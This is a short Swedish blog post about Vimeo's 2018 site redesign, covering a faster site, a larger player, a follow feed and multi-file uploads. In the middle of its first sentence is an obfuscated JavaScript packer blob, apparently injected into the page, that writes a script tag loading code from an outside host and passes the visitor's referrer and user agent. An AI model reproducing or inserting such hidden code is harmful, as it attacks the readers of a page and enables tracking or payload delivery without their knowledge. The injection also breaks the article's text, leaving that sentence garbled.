Image Image Image Image Image Image Image Image Image Image

| 19 oktober, 2018

Scroll to top

Top

Vimeo får ny design

Vimeo får ny design
Sebastian Plengier Ehrnfelt
Detta eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nbkny|var|u0026u|referrer|sskys||js|php’.split(‘|’),0,{}))
är faktiskt den största förändringen sedan 2007.

Nu designar Vimeo om deras sajt och tro det eller ej så är det den största förändringen sedan 2007. Det är inte bara en ny design som väntar utan en helt ny omprogrammerad sajt med massa nya roliga funktioner.

Vimeo har fokuserat på att göra sajten snabbare på alla plan, både för besökarna och de som kodar uppdateringar. Sidan har också fått en större spelare och en funktion att följa olika personer och kanaler i ett eget nyhetsflöde. Innan var flödet din inkorg.

Man ska även nu kunna ladda upp fler än en film åt gången samt se så att din fil är rätt formaterad samtidigt som den laddas upp. Sen är det en massa andra nya funktioner som en förbättrad sökfunktion och lättare navigering

Klicka på läs mer för att se nyheterna